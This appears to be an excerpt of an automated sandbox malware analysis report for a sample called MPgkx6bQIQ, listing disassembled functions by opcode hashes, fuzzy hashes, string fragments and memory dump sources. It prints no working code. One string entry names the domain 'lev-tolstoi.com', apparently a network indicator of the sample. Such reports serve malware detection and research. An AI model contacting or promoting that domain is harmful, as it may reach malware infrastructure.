                                                                                                                                                                                                                                                                                          • API ID: MetricsSystem
                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                          • API String ID: 4116985748-3916222277
                                                                                                                                                                                                                                                                                          • Opcode ID: 39349761bbbd9d5e5dac84a7f5a9780edeb84eb1621c2c8cfd3bf8aab651dcd4
                                                                                                                                                                                                                                                                                          • Instruction ID: 403ffabe11f23b748e06d840ed2f043dd1bcc1ca5a787c04042f92a2a85d24cf
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 39349761bbbd9d5e5dac84a7f5a9780edeb84eb1621c2c8cfd3bf8aab651dcd4
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 365173B4E142189FDB40EFACE98569DBBF0BB88310F114529E499E7350D734AD48CF96
                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1693888263.0000000002480000.00000040.00001000.00020000.00000000.sdmp, Offset: 02480000, based on PE: false
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2480000_MPgkx6bQIQ.jbxd
                                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                                          • String ID: -$C\$Iz$[^
                                                                                                                                                                                                                                                                                          • API String ID: 0-2105564891
                                                                                                                                                                                                                                                                                          • Opcode ID: 856b381f3345170c9e1f152739ef8b6d943d9b4d3d608726b0c255f8cc161e2c
                                                                                                                                                                                                                                                                                          • Instruction ID: 83feb89783d0e8e03a0af41f1f5f3833bcca062e61b7e43a27f1168e45b05c3c
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 856b381f3345170c9e1f152739ef8b6d943d9b4d3d608726b0c255f8cc161e2c
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 7081DCB264C3509FD708CFA9C85185FFBE2EFD5300F59886DE0E58B251D67996068B82
                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1693888263.0000000002480000.00000040.00001000.00020000.00000000.sdmp, Offset: 02480000, based on PE: false
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2480000_MPgkx6bQIQ.jbxd
                                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                                          • String ID: T$U$V$k
                                                                                                                                                                                                                                                                                          • API String ID: 0-1255220828
                                                                                                                                                                                                                                                                                          • Opcode ID: c93e863c5daac2f8ca78168b26a37bbe867cb239aeeaedccae74f18b85e983c0
                                                                                                                                                                                                                                                                                          • Instruction ID: b5b315cef96ff8e6603068b3171df72a60ff363c6aba796a5bcb627c89a6e68a
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: c93e863c5daac2f8ca78168b26a37bbe867cb239aeeaedccae74f18b85e983c0
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: B1A1053150C7908AD3069B3898502AFBBD65FC6328F0A4B2EE5E6473D2D675C585C726
                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                          Memory Dump Source
• Source File: 00000000.00000002.1693216744.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1693216744.0000000000452000.00000040.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_MPgkx6bQIQ.jbxd
Yara matches
Similarity
• API ID:
• String ID: T$U$V$k
• API String ID: 0-1255220828
• Opcode ID: 59490c3d0c457f4f9e70ae9389640b911d80fb55b0c1b22c44bb1761b1145410
• Instruction ID: 419b7bd8d768cf5a93220c289582c9eeb00d0d40764b4ee896287773b3a375b3
• Opcode Fuzzy Hash: 59490c3d0c457f4f9e70ae9389640b911d80fb55b0c1b22c44bb1761b1145410
• Instruction Fuzzy Hash: 4CA1043110C7918BD708CB38985022FBBE25BDA324F1A9B2EE4E6473D2D679C945C74B
APIs
Strings
Memory Dump Source
• Source File: 00000000.00000002.1693888263.0000000002480000.00000040.00001000.00020000.00000000.sdmp, Offset: 02480000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2480000_MPgkx6bQIQ.jbxd
Yara matches
Similarity
• API ID: Uninitialize
• String ID: PT$lev-tolstoi.com
• API String ID: 3861434553-4016702878
• Opcode ID: 2838c07cfca04fbe2cabb14719c9c0661598261e54099377b9e0bd013184ce3a
• Instruction ID: 509d1b93eee6ce9a1ae496d8d3fcf9a0424700ff1f041aaa68fc307b5d1c2203
• Opcode Fuzzy Hash: 2838c07cfca04fbe2cabb14719c9c0661598261e54099377b9e0bd013184ce3a
• Instruction Fuzzy Hash: 64A113B46187918FD326CF39C4A0A66BFE1EF57204B18869DD8D24FB66D339D406CB11
APIs
Strings
Memory Dump Source
• Source File: 00000000.00000002.1693216744.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1693216744.0000000000452000.00000040.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_MPgkx6bQIQ.jbxd
Yara matches
Similarity
• API ID: Uninitialize
• String ID: PT$lev-tolstoi.com
• API String ID: 3861434553-4016702878
• Opcode ID: 2838c07cfca04fbe2cabb14719c9c0661598261e54099377b9e0bd013184ce3a
• Instruction ID: 75a7993a4975897b3fffe1a5d6229db9520caabe5b699855c7cd795a636d0404
• Opcode Fuzzy Hash: 2838c07cfca04fbe2cabb14719c9c0661598261e54099377b9e0bd013184ce3a
• Instruction Fuzzy Hash: 68A1C0B4508B818FD326CF69C490A22BFE1EF57300B1996ADC4D25F7A6D339E806CB55
Strings
Memory Dump Source
• Source File: 00000000.00000002.1693216744.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1693216744.0000000000452000.00000040.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_MPgkx6bQIQ.jbxd
Yara matches
Similarity
• API ID:
• String ID: in~x$kmbj$ydij
• API String ID: 0-2624003027
• Opcode ID: 368771055179ae10f3d8f5d678ba0a53bce91d3d7d6a2510e556935792b0b895
• Instruction ID: f79569228283954ad57b9a6cc496d73d61da5c1ffc761606bfa780fd5c95cafa
• Opcode Fuzzy Hash: 368771055179ae10f3d8f5d678ba0a53bce91d3d7d6a2510e556935792b0b895
• Instruction Fuzzy Hash: A91245B5600A01CFC7248F24D8D16A7BBA2FF96314F18857ED4968B396E738E842CB55
Strings
Memory Dump Source
• Source File: 00000000.00000002.1693888263.0000000002480000.00000040.00001000.00020000.00000000.sdmp, Offset: 02480000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2480000_MPgkx6bQIQ.jbxd
Yara matches
Similarity
• API ID:
• String ID: 0$V$e
• API String ID: 0-3964817793
• Opcode ID: c7716370ac8927f06ffe637d3cea15850e05a15dbd07c9effa12d3fdb0013073
• Instruction ID: 423e8a31a579725d416adccb6ed0b35f1c0f6d461923490d9d1b775acc227a10
• Opcode Fuzzy Hash: c7716370ac8927f06ffe637d3cea15850e05a15dbd07c9effa12d3fdb0013073
• Instruction Fuzzy Hash: E922D57260C7818BD7249B39C4943AEBFD2ABC5320F194A6ED5ED873D1DA748941CB42
Strings
Memory Dump Source
• Source File: 00000000.00000002.1693216744.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1693216744.0000000000452000.00000040.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_MPgkx6bQIQ.jbxd
Yara matches
Similarity
• API ID:
• String ID: 0$V$e
• API String ID: 0-3964817793
• Opcode ID: 9207e5ff9b94fdf015fcac0bd88a7bc55f734a6a516d8fe41e33a64d42c49df1
• Instruction ID: 59230c03b5a3a3693ef44b30c97d38267524f76adfdce6de0efbbb4ceb4d7fde
• Opcode Fuzzy Hash: 9207e5ff9b94fdf015fcac0bd88a7bc55f734a6a516d8fe41e33a64d42c49df1
• Instruction Fuzzy Hash: 9822E77290C7408BD724DF38C4913AEBBD2ABD5324F194A2EE5E9973D1DA388941CB47
Strings
Memory Dump Source
• Source File: 00000000.00000002.1693216744.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1693216744.0000000000452000.00000040.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_MPgkx6bQIQ.jbxd
Yara matches
Similarity
• API ID:
• String ID: 67$V3R5$dB
• API String ID: 0-2543814982
• Opcode ID: 7d6b17f1b35bfbf9a10135164190d2ab3452f23863bf0e0451f9f93f012d59a2
• Instruction ID: 8517aef1948ed283949bb5420b5e04df083ffcb119de912f7f261172b9a423e3
• Opcode Fuzzy Hash: 7d6b17f1b35bfbf9a10135164190d2ab3452f23863bf0e0451f9f93f012d59a2
• Instruction Fuzzy Hash: 28F145B5A0C361CBC714DF24E85126BB7E1AF86304F09487EE8C297352D739E905CB5A
Strings
Memory Dump Source
• Source File: 00000000.00000002.1693888263.0000000002480000.00000040.00001000.00020000.00000000.sdmp, Offset: 02480000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2480000_MPgkx6bQIQ.jbxd
Yara matches
Similarity
                                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                                          • String ID: "w+y$?TUV$DX8Z
                                                                                                                                                                                                                                                                                          • API String ID: 0-3307990326
                                                                                                                                                                                                                                                                                          • Opcode ID: f9c6fa3e94296cf0f303a5eebcc6256c78eaf4459c267ceffca2c103466db4c7
                                                                                                                                                                                                                                                                                          • Instruction ID: 7315892df1c7d2f6982ff7657606a7d3c234dbfdcb31354e0a536e57fada5f92
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: f9c6fa3e94296cf0f303a5eebcc6256c78eaf4459c267ceffca2c103466db4c7
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 5581CE756007128FCB28CF29C890A67BBF2FF96710B19859DD8824FB65E734E841CB55
                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1693888263.0000000002480000.00000040.00001000.00020000.00000000.sdmp, Offset: 02480000, based on PE: false
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2480000_MPgkx6bQIQ.jbxd
                                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                                          • String ID: .$GetProcAddress.$l
                                                                                                                                                                                                                                                                                          • API String ID: 0-2784972518
                                                                                                                                                                                                                                                                                          • Opcode ID: 067b9ac1cfdfa220879cc7a8ef70782a20aa364414f13e2dc252473fde93e59c
                                                                                                                                                                                                                                                                                          • Instruction ID: 8cdf4942245fb07499dfcbfde2d2b629970e6a449e81b357afbaf2dd344a87d1
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 067b9ac1cfdfa220879cc7a8ef70782a20aa364414f13e2dc252473fde93e59c
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 1A314AB6920609DFDB11DF99C880AAEBBF9FF48324F15504AD841A7310D771EA49CFA4
                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1693888263.0000000002480000.00000040.00001000.00020000.00000000.sdmp, Offset: 02480000, based on PE: false
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2480000_MPgkx6bQIQ.jbxd
                                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                                          • String ID: 0$8
                                                                                                                                                                                                                                                                                          • API String ID: 0-46163386
                                                                                                                                                                                                                                                                                          • Opcode ID: 1f5ddf3591017bac3152340072b73a16e36c3305254729570d47587b87dca0fe
                                                                                                                                                                                                                                                                                          • Instruction ID: f0c4bd5c9194a8ed730c7f84f1bc27d05230b103ef3380e9355d08bb5a22abd2
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 1f5ddf3591017bac3152340072b73a16e36c3305254729570d47587b87dca0fe
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: E27235716183409FD724DF18C880BAFBBE1AF88314F45892EF9898B391D775D948CB92
                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1693216744.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1693216744.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_MPgkx6bQIQ.jbxd
                                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                                          • String ID: 0$8
                                                                                                                                                                                                                                                                                          • API String ID: 0-46163386
                                                                                                                                                                                                                                                                                          • Opcode ID: 1f5ddf3591017bac3152340072b73a16e36c3305254729570d47587b87dca0fe
                                                                                                                                                                                                                                                                                          • Instruction ID: d40c633f6dc63a9644a0400b392de52ca6438bdc0a59f23ad90aea60c423d6c9
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 1f5ddf3591017bac3152340072b73a16e36c3305254729570d47587b87dca0fe
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: BC7213716087409FD714CF18C880BABBBE1EB88314F04892EF9899B391D379D948DF96
                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1693216744.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1693216744.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_MPgkx6bQIQ.jbxd
                                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                                          • String ID: "*B$B*B
                                                                                                                                                                                                                                                                                          • API String ID: 0-3938277345
                                                                                                                                                                                                                                                                                          • Opcode ID: 78e285193c8325869296b3d11f9fc92a1318eae965f379fbd1dbd179110fea27
                                                                                                                                                                                                                                                                                          • Instruction ID: c0ff169c622c87bee100c6609ea31c9af3570951461718032b7520edbb3c94ef
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 78e285193c8325869296b3d11f9fc92a1318eae965f379fbd1dbd179110fea27
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 53421276A00211DFCB18CF68DC90AAEB7B2FF49310F598179E905AB395D734AD11CB84
                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1693216744.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1693216744.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_MPgkx6bQIQ.jbxd
                                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                                          • String ID: .$kl
                                                                                                                                                                                                                                                                                          • API String ID: 0-2631956018
                                                                                                                                                                                                                                                                                          • Opcode ID: d144eace9ea77f902bcb9140e81b2a0528f571a57748096d515ff42ca28c8b60
                                                                                                                                                                                                                                                                                          • Instruction ID: 6e525d0f0299ed0e456b3adafb39e2bcab09d4ef44449d93680b2b5d8b67f0fb
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: d144eace9ea77f902bcb9140e81b2a0528f571a57748096d515ff42ca28c8b60
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 1FE1173A218709CBCB189F78EC5127A73F1FF4A741F4A887DD8818B2A1E7B99950C714
                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1693888263.0000000002480000.00000040.00001000.00020000.00000000.sdmp, Offset: 02480000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2480000_MPgkx6bQIQ.jbxd
Yara matches
Similarity
• API ID:
• String ID: BE$de
• API String ID: 0-1272349043
• Opcode ID: 4d61e13fd748368ac6030c890ff82cb0220032c3e56c3c983d389722b1fc0e45
• Instruction ID: a3400a792dbe62ec94cc1ff4fa32dd1f163f65084384a4d3b31ff9b3345a5ce3
• Opcode Fuzzy Hash: 4d61e13fd748368ac6030c890ff82cb0220032c3e56c3c983d389722b1fc0e45
• Instruction Fuzzy Hash: 9BD10A7265C3644BD724EF2888516AFFBD2EFC2208F18496EE8D19B391D775C506CB82
Strings
Memory Dump Source
• Source File: 00000000.00000002.1693216744.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1693216744.0000000000452000.00000040.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_MPgkx6bQIQ.jbxd
Yara matches
Similarity
• API ID:
• String ID: BE$de
• API String ID: 0-1272349043
• Opcode ID: 4d61e13fd748368ac6030c890ff82cb0220032c3e56c3c983d389722b1fc0e45
• Instruction ID: 2d7de7b673e5cb152189fb1770f850f450cdad5ace7171a4f245c8b9200c7c18
• Opcode Fuzzy Hash: 4d61e13fd748368ac6030c890ff82cb0220032c3e56c3c983d389722b1fc0e45
• Instruction Fuzzy Hash: 2BD1057264C3544BD728DF2888516AFBBE2AFC2304F19492DE8D1AB391D678C916C787
Strings
Memory Dump Source
• Source File: 00000000.00000002.1693888263.0000000002480000.00000040.00001000.00020000.00000000.sdmp, Offset: 02480000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2480000_MPgkx6bQIQ.jbxd
Yara matches
Similarity
• API ID:
• String ID: )$IEND
• API String ID: 0-707183367
• Opcode ID: 77fecbe1ae68033b4a8663d8c056a40f5f9b3b2dca52a2b3e7224ada374ec122
• Instruction ID: e1816e4ec8c87f1ea5c1a08517835fdc413b418ad9c2f9b45a8b33971d1ea1ef
• Opcode Fuzzy Hash: 77fecbe1ae68033b4a8663d8c056a40f5f9b3b2dca52a2b3e7224ada374ec122
• Instruction Fuzzy Hash: 66D1BFB19083459FE720EF28C840B5FBBE5AF94304F04492EF999AB381D775D948CB92
Strings
Memory Dump Source
• Source File: 00000000.00000002.1693216744.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1693216744.0000000000452000.00000040.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_MPgkx6bQIQ.jbxd
Yara matches
Similarity
• API ID:
• String ID: +oQ$?{;}
• API String ID: 0-1414831546
• Opcode ID: 1ee29228f1a6319e217c168091de010b371413e67c26b3c1ec204d280338f3ea
• Instruction ID: f7e0cf01948a060ca3ae4ae96257901d3d9473cfc3be429b8585dccf822635a3
• Opcode Fuzzy Hash: 1ee29228f1a6319e217c168091de010b371413e67c26b3c1ec204d280338f3ea
• Instruction Fuzzy Hash: BCB1BFB4E043189FEB20DF68D942B9EBBB0FB45304F1081ADE158AB381D7758946CF96
Strings
Memory Dump Source
• Source File: 00000000.00000002.1693888263.0000000002480000.00000040.00001000.00020000.00000000.sdmp, Offset: 02480000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2480000_MPgkx6bQIQ.jbxd
Yara matches
Similarity
• API ID:
• String ID: Fg$RU]l
• API String ID: 0-3680832515
• Opcode ID: 212695677cf782d22b69bcc5005693ffe3c19f735568b368facab7bd000f874a
• Instruction ID: 23352fc8e9d744e6c6d5e1c93ed4da7102920fdd9c62647b41baec33340df81d
• Opcode Fuzzy Hash: 212695677cf782d22b69bcc5005693ffe3c19f735568b368facab7bd000f874a
• Instruction Fuzzy Hash: 5771C77121D3808BE7798F25C8617EB7BD3EBE2218F18996DC0D947392DB39400ADB12
Strings
Memory Dump Source
• Source File: 00000000.00000002.1693216744.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1693216744.0000000000452000.00000040.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_MPgkx6bQIQ.jbxd
Yara matches
Similarity
• API ID:
• String ID: Fg$RU]l
• API String ID: 0-3680832515
• Opcode ID: 2cdefad0313fa6e4cc5bdb883f2834b1e6d918137519908ea04b1d30e5e067f0
• Instruction ID: 6f8db59bce85ef316af4e5eced37d01641f7d5c841364d3efc2c21db6cf2a903
• Opcode Fuzzy Hash: 2cdefad0313fa6e4cc5bdb883f2834b1e6d918137519908ea04b1d30e5e067f0
• Instruction Fuzzy Hash: 2171087120D3808BE7398F25D8A57EB7BD2EBD2304F58996DC0C987392DB78440ACB56
Strings
Memory Dump Source
• Source File: 00000000.00000002.1693216744.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1693216744.0000000000452000.00000040.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_MPgkx6bQIQ.jbxd
Yara matches
Similarity
• API ID:
• String ID: O28+$h
• API String ID: 0-657163135
• Opcode ID: 8dd85ae810d5b5fecc68ec4464ee5e33d050158683b23acf0f2d06bcda51bc6b
• Instruction ID: 943cae955c8ebe7c4b26d457fd1afafbf5e793f4316e69c7cecf830d1c43eab0
• Opcode Fuzzy Hash: 8dd85ae810d5b5fecc68ec4464ee5e33d050158683b23acf0f2d06bcda51bc6b
• Instruction Fuzzy Hash: B561BE32B887258BD3149A38A8901B7F791EB55350F88473EDD96873C2E63C9D09C3DA
Strings
Memory Dump Source
• Source File: 00000000.00000002.1693888263.0000000002480000.00000040.00001000.00020000.00000000.sdmp, Offset: 02480000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2480000_MPgkx6bQIQ.jbxd
Yara matches
Similarity
• API ID:
• String ID: @$ihgf
• API String ID: 0-73152791
• Opcode ID: f9d2302128f83c98de01ee7664bc871aec8e86cdf99c8f751253d6371e8ab131
                                                                                                                                                                                                                                                                                          • Instruction ID: edb45b757f3296fd3e75d76d1f1fed6797a38a386dc29e24633baeaf1c52c19b
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: f9d2302128f83c98de01ee7664bc871aec8e86cdf99c8f751253d6371e8ab131
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 4F4102B5A042018FD715CF24C8C17BBB7A6FF82318F14862EE5959B390E735A915CBA2
                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1693888263.0000000002480000.00000040.00001000.00020000.00000000.sdmp, Offset: 02480000, based on PE: false
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2480000_MPgkx6bQIQ.jbxd
                                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                                          • String ID: Z\$^P
                                                                                                                                                                                                                                                                                          • API String ID: 0-3724859648
                                                                                                                                                                                                                                                                                          • Opcode ID: 4f7f96cc206f4a51d8ad8bab145ebd28e0a9ebd1b083b1ab060fd53171580dc2
                                                                                                                                                                                                                                                                                          • Instruction ID: 3ed233613240f3d48e8c476488e5d4917bc9795eedf7bb8d14322ae44cdbc2e1
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 4f7f96cc206f4a51d8ad8bab145ebd28e0a9ebd1b083b1ab060fd53171580dc2
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 7C41C2B1911600CFCB19CF28C891A62BBB2FF89324B16855DD49A8F765E734E842CB55
                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1693216744.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1693216744.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_MPgkx6bQIQ.jbxd
                                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                                          • String ID: AzB$`rB
                                                                                                                                                                                                                                                                                          • API String ID: 0-365317308
                                                                                                                                                                                                                                                                                          • Opcode ID: 7d44a20d46df19d3b9013d5ff9cf62f4e3051a7763f9fbf866a5162179f586f0
                                                                                                                                                                                                                                                                                          • Instruction ID: 6eccde100400f429e4c459893b2eae1b4256d2ec662aaeb68cc10dd30f14b8df
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 7d44a20d46df19d3b9013d5ff9cf62f4e3051a7763f9fbf866a5162179f586f0
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 44118BB960C3919FC3049F29D59011BFBE0ABD5708F54DA6CE8C96B312D338DA018B8A
                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1693216744.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1693216744.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_MPgkx6bQIQ.jbxd
                                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                                          • String ID: AzB$`rB
                                                                                                                                                                                                                                                                                          • API String ID: 0-365317308
                                                                                                                                                                                                                                                                                          • Opcode ID: d52ee1f8136c3b98c0a9c934921d80b1beb3214e8eb7b5d6a7a040de55795b14
                                                                                                                                                                                                                                                                                          • Instruction ID: f6425de8d121e4265380cb8b8556ee32d0ff2cc323f56d540e3951a84df8493e
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: d52ee1f8136c3b98c0a9c934921d80b1beb3214e8eb7b5d6a7a040de55795b14
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 810169B520D3919FC3049F29D59011BFBE0BBD5708F549A6CE8C96B312D334DA418B4A
                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1693216744.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1693216744.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_MPgkx6bQIQ.jbxd
                                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                                          • String ID: c$
                                                                                                                                                                                                                                                                                          • API String ID: 0-2516980088
                                                                                                                                                                                                                                                                                          • Opcode ID: 3e7173b7f35150ce67f14e4cf7677baf70ca03931a29a373c7b3ea58a15b4991
                                                                                                                                                                                                                                                                                          • Instruction ID: 8ddf10d90ef0e2d4ef8b1445a283de62437e0b874c2761f734db7318cd05b52d
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 3e7173b7f35150ce67f14e4cf7677baf70ca03931a29a373c7b3ea58a15b4991
